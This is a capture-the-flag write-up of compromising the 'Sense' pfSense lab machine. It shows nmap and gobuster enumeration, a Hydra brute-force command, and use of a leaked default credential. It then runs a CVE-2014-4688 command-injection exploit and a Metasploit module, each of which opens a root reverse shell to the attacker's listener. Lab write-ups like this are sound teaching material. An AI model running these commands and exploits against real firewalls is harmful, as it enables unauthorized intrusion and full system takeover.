Sense

Reconnaissance:

NMAP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.60

80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35

443/tcp open  ssl/http lighttpd 1.4.35
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time
|_http-server-header: lighttpd/1.4.35

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.60

All 1000 scanned ports on 10.10.10.60 (10.10.10.60) are in ignored states.

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.60

80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35

443/tcp open  ssl/http lighttpd 1.4.35
|_http-title: Login
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35

I hadn’t figure out my go-to syntax for nmap back then (first -p- --min-rate 10000, then -p [ports] -sCV).

The web server is lighttpd. The certificate on TLS isn’t filled in with any information. I can look at it in Firefox and confirm it is just defaults:

Port 80 redirects to port 443 so we really only have one port to enumerate. https://10.10.10.60/

Enumeration: HTTPS - TCP 443

Let’s start enumerating port 443. Visit the application using the browser.

We get a pfSense login page. pfSense is a free and open-source firewall and router. Since it is an off the shelf software, the first thing I did is google “pfsense default credentials” and found the following page.

admin
pfsense

I tried admin/pfsense but that did not work. I also tried common credentials such as admin/admin, pfsense/pfsense, admin/password, etc.

When that didn’t work I had a not-so-bright-idea of brute forcing the credentials using Hydra.

┌──(kali💀kali)-[~]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.60 https-post-form "/index.php:__csrf_magic=sid%3A44c8728e26d47be027a7a01c98089e974f010329%2C1577594299&usernamefld=^USER^&passwordfld=^PASS^&login=Login:Username or Password incorrect"

That ended up getting me blocked. In hindsight it makes sense. It wasn’t very smart to brute force the credentials of a firewall.

Directory Brute Force:

┌──(kali💀kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60 -k

/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]

I didn’t get anything useful.

Let’s change our gobuster command to include extensions.

┌──(kali💀kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60 -k -x php,txt,conf,html

/index.html           (Status: 200) [Size: 329]
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/edit.php             (Status: 200) [Size: 6689]
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/system-users.txt     (Status: 200)

I added the extensions txt & conf to look for any configuration files or text files left by system administrators. Two files that immediately catch my eye are changelog.txt & system-users.txt.

https://10.10.10.60/system-users.txt Security Changelog Issue There was a failure in updating the firewall. Manual patching is therefore required Mitigated 2 of 3 vulnerabilities have been patched Timeline The remaining patches will be installed during the next maintenance window

https://10.10.10.60/system-users.txt Support ticket Please create the following user username: Rohit password: company defaults

The change-log.txt file tells us that they’re definitely using a vulnerable version of pfSense. However, they did patch two of the three vulnerabilities that are associated with this software. We have to keep that in mind when exploiting the application. The system-users.txt file gives us credentials!

The username is rohit and the password is the default password pfsense. Let’s log into the application.

Next, run searchsploit to view if the software is associated with any vulnerabilities.

┌──(kali💀kali)-[~]
└─$ searchsploit pfsense
--------------------------------------------------------------- ---------------------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------------
pfSense - 'interfaces.php?if' Cross-Site Scripting             | hardware/remote/35071.txt
pfSense - 'pkg.php?xml' Cross-Site Scripting                   | hardware/remote/35069.txt
pfSense - 'pkg_edit.php?id' Cross-Site Scripting               | hardware/remote/35068.txt
pfSense - 'status_graph.php?if' Cross-Site Scripting           | hardware/remote/35070.txt
pfSense - (Authenticated) Group Member Remote Command Executio | unix/remote/43193.rb
pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting V | php/remote/34985.txt
pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forg | php/webapps/23901.txt
pfSense 2.1 build 20130911-1816 - Directory Traversal          | php/webapps/31263.txt
pfSense 2.2 - Multiple Vulnerabilities                         | php/webapps/36506.txt
pfSense 2.2.5 - Directory Traversal                            | php/webapps/39038.txt
pfSense 2.3.1_1 - Command Execution                            | php/webapps/43128.txt
pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forg | php/webapps/41501.txt
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection               | php/webapps/47413.py
pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjac | php/remote/43341.rb
pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross- | php/webapps/46538.txt
pfSense 2.4.4-p1 - Cross-Site Scripting                        | multiple/webapps/46316.txt
pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Sit | php/webapps/46936.txt
pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Script | freebsd/webapps/48300.txt
pfSense 2.4.4-p3 - Cross-Site Request Forgery                  | php/webapps/48714.txt
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py
pfSense Community Edition 2.2.6 - Multiple Vulnerabilities     | php/webapps/39709.txt
pfSense Firewall 2.2.5 - Config File Cross-Site Request Forger | php/webapps/39306.html
pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery   | php/webapps/39695.txt
pfSense UTM Platform 2.0.1 - Cross-Site Scripting              | freebsd/webapps/24439.txt
pfSense v2.7.0 - OS Command Injection                          | php/webapps/51608.rb
pfsenseCE v2.6.0 - Anti-brute force protection bypass          | hardware/remote/51352.py

The version number is 2.1.3. If we go back to our searchsploit results, one exploit does stand out.

pfSense Community Edition 2.2.6 - Multiple Vulnerabilities     | php/webapps/39709.txt

Shell as root

Transfer the exploit to our directory.

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m 43560.py
  Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
      URL: https://www.exploit-db.com/exploits/43560
     Path: /usr/share/exploitdb/exploits/php/webapps/43560.py
    Codes: CVE-2014-4688
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/43560.py

Look at the exploit to see what it’s doing.

pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command InjectionExploit Database

It seems that the status_rrd_graph_img.php script is vulnerable to a command injection. To exploit that, the script is passing a simple python reverse shell (with the configuration parameters we pass as arguments) as a command. It does octal encode the reverse shell command which leads me to believe that there is either some form of filtering being done at the backend or the application crashes on certain characters. To sum up, it’s a very simple script that sends a reverse shell back to our attack machine.

Therefore, let’s up a listener to receive the shell.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234

Then run the exploit.

┌──(kali💀kali)-[~/Desktop]
└─$ python3 43560.py --rhost 10.10.10.60 --lhost 10.10.16.4 --lport 1234 --username rohit --password pfsense

┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.60] 20189
sh: can't access tty; job control turned off
# whoami
root

# cat /root/root.txt
d08c---------------------------

# cat /home/rohit/user.txt
87213--------------------------

For this machine, we don’t have to escalate privileges since pfSense is running as root and therefore when we exploited the command injection vulnerability we got a shell with root privileges.

Shell with Metasploit

searchsploit shows some exploits for the HTTP server, lighttpd, but all for older versions:

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit lighttpd                           

lighttpd - Denial of Service (PoC)                             | linux/dos/18295.txt
Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service  | windows/remote/30322.rb
Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Execu | multiple/remote/4391.c
Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execu | linux/remote/4437.c
lighttpd 1.4.31 - Denial of Service (PoC)                      | linux/dos/22902.sh
Lighttpd 1.4.x - mod_userdir Information Disclosure            | linux/remote/31396.txt
lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Serv | linux/dos/33591.sh
Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure       | multiple/remote/8786.txt

On originally solving, I searched for PFSence exploits in Metasploit, and there were a couple:

┌──(kali💀kali)-[~]
└─$ msfconsole

msf6 >  search pfsense

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/http/pfsense_clickjacking          2017-11-21       normal     No     Clickjacking Vulnerability In CSRF Error Page pfSense
   1  exploit/unix/http/pfsense_diag_routes_webshell  2022-02-23       excellent  Yes    pfSense Diag Routes Web Shell Upload
   2  exploit/unix/http/pfsense_config_data_exec      2023-03-18       excellent  Yes    pfSense Restore RRD Data Command Injection
   3  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
   4  exploit/unix/http/pfsense_group_member_exec     2017-11-06       excellent  Yes    pfSense authenticated group member RCE
   5  exploit/unix/http/pfsense_pfblockerng_webshell  2022-09-05       great      Yes    pfSense plugin pfBlockerNG unauthenticated RCE as root

The first one is a clickjacking exploit, which doesn’t seem useful to me. The next one is interesting, as it’s an injection into the graph function, which is implemented in this host:

msf6 > use 3
msf6 exploit(unix/http/pfsense_graph_injection_exec) > options
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set RHOSTS 10.10.10.60
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set USERNAME rohit
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 10.10.16.4
msf6 exploit(unix/http/pfsense_graph_injection_exec) > run

[*] Started reverse TCP handler on 10.10.16.4:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39927 bytes) to 10.10.10.60
[+] Deleted tRA
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.10.10.60:65345) at 2023-12-31 01:14:58 -0500

meterpreter > shell
Process 18684 created.
Channel 0 created.

python -c 'import pty;pty.spawn("/bin/sh")'
# 

# whoami
root